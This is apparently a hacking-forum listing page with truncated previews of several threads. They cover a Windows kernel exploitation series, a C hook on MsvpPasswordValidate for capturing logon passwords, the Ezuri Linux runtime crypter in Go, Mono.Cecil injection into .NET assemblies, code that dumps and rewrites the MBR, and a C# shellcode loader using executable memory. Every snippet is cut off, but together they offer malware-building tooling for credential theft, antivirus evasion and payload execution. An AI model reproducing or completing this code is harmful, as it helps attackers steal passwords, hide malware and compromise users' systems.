Tags
Author: SWaNk - Replies: 0 - Views: 1417
Starting with Windows Kernel Exploitation


Starting with Windows Kernel Exploitation Based on HackSysExtremeVulnerableDriver

Part 1 – setting up the lab
Part 2 – getting familiar with HackSys Extreme Vulnerable Driver
Part 3 – stealing the Access Token

Links:
[hide]
[url=https://hshrzd.word
Author: regasmx86 - Replies: 0 - Views: 1403
[Windows] Password Hooking with MsvpPasswordValidate
[hide]
PasswdHook.c

[code]#include "common.h"

static
BOOLEAN
MsvpPasswordValidate( BOOLEAN UasCompatibilityRequired,
      NETLOGON_LOGON_INFO_CLASS LogonLevel,
      PVOID LogonInformation,
      PUSER_INTERNAL1_INFORMATION Passwords,
      PULONG UserFlags,
      PUSER_SESSION_KEY UserSessionKey,
      PVOID LmSessionKey
      )
{
    return ((FnMsvpPasswordValidate)g_MsvpPasswordValidate)(
        UasCompatibilityRequired,
        LogonLevel,
        LogonInformation
Author: TMZ - Replies: 0 - Views: 1718
Ezuri: Linux runtime crypter with memfd_create
A small Golang runtime crypter demonstrating memfd_create syscall usage to run ELF executables from memory in Linux. Works on kernel versions >= 3.17 (relies on the memfd_create syscall).

aes.go
[hide]
[code]
package main

import (
	"crypto/aes"
	"crypto/cipher"
)

func aesEnc(srcBytes []byte, key string, iv string) []byte {
	block, err := aes.NewCipher([]byte(key))
	check(err)

	encrypter := cipher.NewCFBEncrypter(block, []byte(iv))
	encrypted := make([]byte, len(srcBytes))
Author: TMZ - Replies: 1 - Views: 1497
Injection with Mono.Cecil
This may not be news for everyone but I find it interesting. Mono.Cecil is an impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here’s the test scenario:

A dummy C# application like the one below, compile it to get its executable file, that’s what we need:

[hide]
[code]
using System;

namespace Dummy
{
    class Program
    {
        public static v
Author: TMZ - Replies: 0 - Views: 1239
MBR Dump With .NET
Years ago I was messing around with Windows MBR (on VXHeaven) and got stuck while trying to write a modified copy back to the disk.

[hide]
[code]
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;

namespace MBR
{
    class MainClass
    {

        [DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        static extern uint SetFilePointer(
            [In] SafeFileHandle hFile,
            [In] int lDistanceToMove,
            [Out] out int lpDis
Author: regasmx86 - Replies: 0 - Views: 2264
Shellcode execution with C#
Your shellcode has to be pasted in C++ format: { 0xDE, 0xAD, 0xBE, 0xEF }

[hide]
[code]
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace Net_Shellcode_Execution
{
    class Program
    {
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
        [DllImport("kernel32")]
        private static extern